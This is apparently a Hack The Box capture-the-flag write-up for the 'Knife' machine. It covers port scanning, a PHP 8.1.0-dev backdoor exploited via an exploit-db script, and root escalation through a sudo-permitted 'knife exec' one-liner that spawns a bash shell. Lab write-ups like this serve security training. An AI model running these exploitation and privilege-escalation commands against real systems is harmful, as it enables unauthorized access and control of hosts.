HTB - Knife
Scanning
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p- -T4 10.10.10.242
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-31 10:02 EDT
Nmap scan report for 10.10.10.242
Host is up (0.043s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:8.2p1:
| CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778
| C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 6.8 https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 *EXPLOIT*
| 10213DBE-F683-58BB-B6D3-353173626207 6.8 https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207 *EXPLOIT*
| CVE-2020-12062 5.0 https://vulners.com/cve/CVE-2020-12062
| MSF:ILITIES/GENTOO-LINUX-CVE-2021-28041/ 4.6 https://vulners.com/metasploit/MSF:ILITIES/GENTOO-LINUX-CVE-2021-28041/ *EXPLOIT*
| CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041
| CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617
| MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/ *EXPLOIT*
| MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/ *EXPLOIT*
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012
|_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
|_ /icons/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.41:
| E899CC4B-A3FD-5288-BB62-A4201F93FDCC 10.0 https://vulners.com/githubexploit/E899CC4B-A3FD-5288-BB62-A4201F93FDCC *EXPLOIT*
| 5DE1B404-0368-5986-856A-306EA0FE0C09 10.0 https://vulners.com/githubexploit/5DE1B404-0368-5986-856A-306EA0FE0C09 *EXPLOIT*
| MSF:ILITIES/UBUNTU-CVE-2020-11984/ 7.5 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2020-11984/ *EXPLOIT*
| MSF:ILITIES/REDHAT_LINUX-CVE-2020-11984/ 7.5 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2020-11984/ *EXPLOIT*
| MSF:ILITIES/ORACLE_LINUX-CVE-2020-11984/ 7.5 https://vulners.com/metasploit/MSF:ILITIES/ORACLE_LINUX-CVE-2020-11984/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-11984/ 7.5 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-11984/ *EXPLOIT*
| MSF:ILITIES/FREEBSD-CVE-2020-11984/ 7.5 https://vulners.com/metasploit/MSF:ILITIES/FREEBSD-CVE-2020-11984/ *EXPLOIT*
| MSF:ILITIES/APACHE-HTTPD-CVE-2020-11984/ 7.5 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2020-11984/ *EXPLOIT*
| CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943
| CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720
| CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790
| CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275
| CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691
| CVE-2020-11984 7.5 https://vulners.com/cve/CVE-2020-11984
| 1337DAY-ID-34882 7.5 https://vulners.com/zdt/1337DAY-ID-34882 *EXPLOIT*
| FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 *EXPLOIT*
| CVE-2022-22721 6.8 https://vulners.com/cve/CVE-2022-22721
| CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438
| CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452
| 8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 6.8 https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 *EXPLOIT*
| 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 *EXPLOIT*
| CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224
| CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927
| MSF:ILITIES/REDHAT_LINUX-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2020-9490/ *EXPLOIT*
| MSF:ILITIES/ORACLE_LINUX-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/ORACLE_LINUX-CVE-2020-9490/ *EXPLOIT*
| MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1934/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1934/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-9490/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-9490/ *EXPLOIT*
| MSF:ILITIES/FREEBSD-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/FREEBSD-CVE-2020-9490/ *EXPLOIT*
| MSF:ILITIES/CENTOS_LINUX-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2020-9490/ *EXPLOIT*
| MSF:ILITIES/APACHE-HTTPD-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2020-9490/ *EXPLOIT*
| MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2020-9490/ *EXPLOIT*
| CVE-2022-22719 5.0 https://vulners.com/cve/CVE-2022-22719
| CVE-2021-36160 5.0 https://vulners.com/cve/CVE-2021-36160
| CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798
| CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193
| CVE-2021-30641 5.0 https://vulners.com/cve/CVE-2021-30641
| CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690
| CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490
| CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934
| CVE-2020-13950 5.0 https://vulners.com/cve/CVE-2020-13950
| CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567
| MSF:ILITIES/REDHAT_LINUX-CVE-2020-11993/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2020-11993/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-11993/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-11993/ *EXPLOIT*
| MSF:ILITIES/CENTOS_LINUX-CVE-2020-11993/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2020-11993/ *EXPLOIT*
| MSF:ILITIES/APACHE-HTTPD-CVE-2020-11993/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2020-11993/ *EXPLOIT*
| MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2020-11993/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2020-11993/ *EXPLOIT*
| CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993
|_ 1337DAY-ID-35422 4.3 https://vulners.com/zdt/1337DAY-ID-35422 *EXPLOIT*
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
Exploit
After not finding much information, I inspected the website response headers in burpsuite. This told me it was running a dev version of PHP.
After searching i found php8.1.0-dev has a backdoor which was put there in a 2021 apache hack. I found a script to get a shell using this backdoor:
https://www.exploit-db.com/exploits/49933
┌──(kali㉿kali)-[~]
└─$ python3 exploit_php.py
Enter the full host url:
http://10.10.10.242/
The shell worked and I got access as user ‘james’ which allowed me to get the user flag.
$ ls home
james
$ ls /home/james
user.txt
$ cat /home/james/user.txt
ad07732c7b1144f5f181e47c********
##Privilege Escelation The first thing to do when looking to privesc on linux is see what your user can run. This showed me it can run a knife command.
james@knife:/$ sudo -l
sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
by using knife you can run ruby code. This can be used to open a TTY shell as root allowing me to get the root flag.
james@knife:/$ sudo knife exec -E "exec '/bin/bash'"
sudo knife exec -E "exec '/bin/bash'"
id
uid=0(root) gid=0(root) groups=0(root)
cd home
cd ..
cd root
ls
delete.sh
root.txt
snap
cat root.txt
897d6db0dc46327655455952********